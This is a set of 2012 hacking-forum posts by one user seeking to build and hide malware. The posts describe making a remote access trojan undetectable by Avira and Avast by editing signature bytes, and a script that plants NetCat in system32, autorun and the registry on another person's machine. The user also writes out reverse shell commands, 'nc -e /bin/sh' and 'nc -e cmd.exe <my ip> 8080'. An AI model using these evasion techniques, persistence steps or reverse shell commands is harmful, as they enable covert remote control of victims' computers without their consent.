Messages - Exon

1
Tutorials / Re: Bypassing AntiVirus Scanner
« on: April 23, 2012, 07:26:31 PM »
I wonder if you could fool AVs if you use a really complex custom encoder, or if they'd still detect it...

2
Hacking and Security / Re: [Question] Assembly Ghostwriting - Problem
« on: April 23, 2012, 03:29:03 PM »
That depends on what is being found. If it's a simple string, try rewriting it to lowercase:


e.g.:


Detected: DDOSYNFLOOD
Undetected: ddosynflood


Problem is, if the detected part is, for example, in the code section, changing the hex code will probably break your program.

3
Tutorials / Re: Bypassing AntiVirus Scanner
« on: April 23, 2012, 03:26:17 PM »
This method will only fool the stupidest of AVs, but thanks for posting nonetheless, was an interesting read.

4
Hacking and Security / Re: [Question] Assembly Ghostwriting - Problem
« on: April 21, 2012, 04:00:52 AM »
I'm not randomly changing content. The executable was split with each file being 1 byte bigger than the last. All of them were scanned, showing me at which byte the AV starts detecting the signature. The highlighted part is the signature the AV is detecting with static binary analysis and that's what I'm trying to change. Already got it to work though! :D

5
Hacking and Security / [Question] Assembly Ghostwriting - Problem
« on: April 20, 2012, 01:26:21 AM »
Ok so here's my problem. I'm trying to make a RAT undetected by Avira with Assembly Ghostwriting using Hex Workshop, problem is, the Virus Signature that Avast detected seems to be the file padding(?).





-> The highlighted part is the virus signature detected (by heuristics) as Crypted (suspicious, not as a threat)!
-> Only the very last Byte of the executable got detected as a Backdoor (by Static Binary Analysis) (threat)!
         -> In this case that would be Hex Value 44 or the


Now this seems very strange to me, first because what has been detected seems to be the padding which, afaik is empty code (or is it?), and secondly because only the very last Byte got detected as a trojan.


I tried changing the padding (which I'm not even sure if that's a string or not) to lowercase to change the hex code and spoof the AV; didn't work. Also tried deleting all of the highlighted hex code and executing it, but it told me that it was an invalid win32 executable.


Anybody got any ideas?


Thanks!






6
Hacking and Security / Re: [Request] DSplit Download?
« on: April 19, 2012, 05:18:28 PM »
Trying to make Trojans undetectable using Ghost Writing ASM. Dsplit is very convenient for that. I've already found it on the web though, thanks anyways ;P

7
Hacking and Security / Re: [Request] DSplit Download?
« on: April 19, 2012, 10:32:34 AM »
Trying to split .exes and mess around a bit.

8
Hacking and Security / [Request] DSplit Download?
« on: April 19, 2012, 01:39:31 AM »
Need a good splitting program that keeps the extension.


Looking for DSplit but only found it on one site and my AV started spazzing out. Anybody have a link or an alternative? Thanks!

9
Hacking and Security / Hidden non-UNIX TCP/IP based Backdoor?
« on: April 18, 2012, 03:20:23 PM »
Are there any TCP/IP based hidden backdoors for non-UNIX systems out there? I've been looking for quite some time now and I'm starting to lose hope. Was thinking about coding my own but I'm not sure if I'm experienced enough yet... Any ideas?

10
Hacking and Security / Re: [Question]NetCat Reverse Shell
« on: April 17, 2012, 11:04:24 PM »
How would   nc -e /bin/sh 127.0.0.1 8080; sleep 30; done; give me multiple connections? Wouldn't it have to be a loop with a timer? 
On a side note, thanks for replying ;)

Edit: How do I force it to start cmd.exe on my end once I pick something up while listening on port 8080?
nc -e cmd.exe <my ip> 8080 ?

11
Hacking and Security / [Question]NetCat Reverse Shell
« on: April 17, 2012, 09:17:35 PM »
Hey there,


So I'm new to this forum and programming/hacking in general and I've started learning Python, but to waste time on the side I was messing around a bit with NetCat.

I've created a script that loads itself into sys32 on the homedrive, into autorun and the registry, starts NetCat listening on Port 8080. Problem is that I'M connecting to him and not the other way around, meaning if he doesn't have Port 8080 open I won't be able to connect.


So my question is, how do I create a Reverse Shell(?) so that he connects to me?


Thanks in advance!
